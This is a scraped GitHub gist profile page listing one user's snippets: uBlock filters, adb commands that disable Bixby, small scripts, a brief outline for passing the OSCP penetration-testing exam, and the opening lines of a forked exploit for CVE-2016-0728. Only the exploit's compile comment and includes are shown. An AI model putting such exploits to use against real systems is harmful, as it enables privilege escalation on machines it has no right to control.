Skip to content

Instantly share code, notes, and snippets.

View ingochris's full-sized avatar
🏸
ssh -l level1 blackbox.smashthestack.org -p2225

Christopher Ngo ingochris

🏸
ssh -l level1 blackbox.smashthestack.org -p2225
View GitHub Profile
@ingochris
ingochris / FacebookMessengerWebAppSidebaruBlockFix.txt
Created December 5, 2022 02:04
Custom uBlock filter to remove the new facebook sidebar and "install messenger app" nag bar to return screen real estate and restore non-16:9 functionality
##.x18d9i69.xexx8yu.x4uap5.xkhd6sd.xycxndf.xeuugli.x193iq5w.x2lah0s.xdt5ytf.x78zum5.x1ja2u2z.x1n2onr6.x9f619
##.x12nzpgo.x1lku1pv.x5ib6vp.x18d9i69.xc73u3c.xexx8yu.xt55aet.x1c4vz4f.xb756pt.x1q0g3np.xozqiw3.x6s0dn4.x1qughib.xeuugli.xs83m0k.x1r8uery.x78zum5.x1ja2u2z.x1n2onr6.x9f619
@ingochris
ingochris / bixby_adb_disabler.md
Created September 18, 2022 05:01
adb shell commands to disable bixby on samsung phones without ROOT perms

The commands:

adb shell
pm disable-user --user 0 com.samsung.android.app.settings.bixby
pm disable-user --user 0 com.samsung.systemui.bixby2
pm disable-user --user 0 com.samsung.android.bixby.service
pm disable-user --user 0 com.samsung.android.bixby.agent
pm disable-user --user 0 com.samsung.android.bixbyvision.framework
pm disable-user --user 0 com.samsung.android.bixby.wakeup
pm disable-user --user 0 com.samsung.android.bixby.agent.dummy
gf found this in manhattan
#!/bin/bash
meaningoflife=42
pass=0
echo "Hello, what is the meaning of life?"
while [ "$pass" -ne 1 ];
do
@ingochris
ingochris / manga
Last active January 22, 2018 00:53
manga.js
// ==UserScript==
// @name Manga OnlineViewer
// @description Shows all pages at once in online view. MangaFox, MangaReader/MangaPanda, MangaStream, MangaInn, AnyManga, AnimeA, MangaHere, MangaShare, Batoto, MangaDevil, MangaCow, MangaChapter, 7manga, MangaPirate.net and MangaBee/OneManga.me manga sites. Fakku, HBrowse, Hentai2Read and Doujin-moe Hentai sites.
// @version 8.16
// @date 2014-04-29
// @author Tago
// @grant GM_getValue
// @grant GM_setValue
// @namespace https://userscripts-mirror.org/users/57679
// @source https://userscripts-mirror.org/scripts/show/139639

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

Disa.Framework.Shared/Emoji.cs:304: new Map("white smiling face", "263a", "e6f0", "e4fb", "e414", "fe336", "\u263a"),
Disa.Framework.Shared/Emoji.cs:366: new Map("mount fuji", "1f5fb", "e740", "e5bd", "e03b", "fe4c3", "\ud83d\uddfb"),
Disa.Framework.Shared/Emoji.cs:420: new Map("electric torch", "1f526", "e6fb", "e583", "-", "fe4fb", "\ud83d\udd26"),
Disa.Framework.Shared/Emoji.cs:527: new Map("running shirt with sash", "1f3bd", "e652", "-", "-", "fe7d0", "\ud83c\udfbd"),
Disa.Framework.Shared/Emoji.cs:530: new Map("tennis racquet and ball", "1f3be", "e655", "e4b7", "e015", "fe7d3", "\ud83c\udfbe"),
Disa.Framework.Shared/Emoji.cs:532: new Map("ski and ski boot", "1f3bf", "e657", "eaac", "e013", "fe7d5", "\ud83c\udfbf"),
Disa.Framework.Shared/Emoji.cs:569: new Map("tent", "26fa", "-", "e5d0", "e122", "fe7fb", "\u26fa"),
Disa.Framework.Shared/Emoji.cs:587: new Map("slot machine", "1f3b0", "-",
CC=clang-3.8
CFLAGS=-Wall -Wextra -std=gnu11 -lpthread -O0
all: primary
build: primary
primary: primary.c
$(CC) primary.c $(CFLAGS) -o primary -ltcmalloc
def I(s):
val = 0
for i in range(len(s)):
digit = ord(s[len(s) - i - 1])
val <<= 8
val |= digit
return val
def Sn(i, length):
s = ''
@ingochris
ingochris / cve_2016_0728.c
Created June 3, 2016 22:36 — forked from PerceptionPointTeam/cve_2016_0728.c
cve_2016_0728 exploit
/* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */
/* $ ./cve_2016_072 PP_KEY */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <keyutils.h>
#include <unistd.h>
#include <time.h>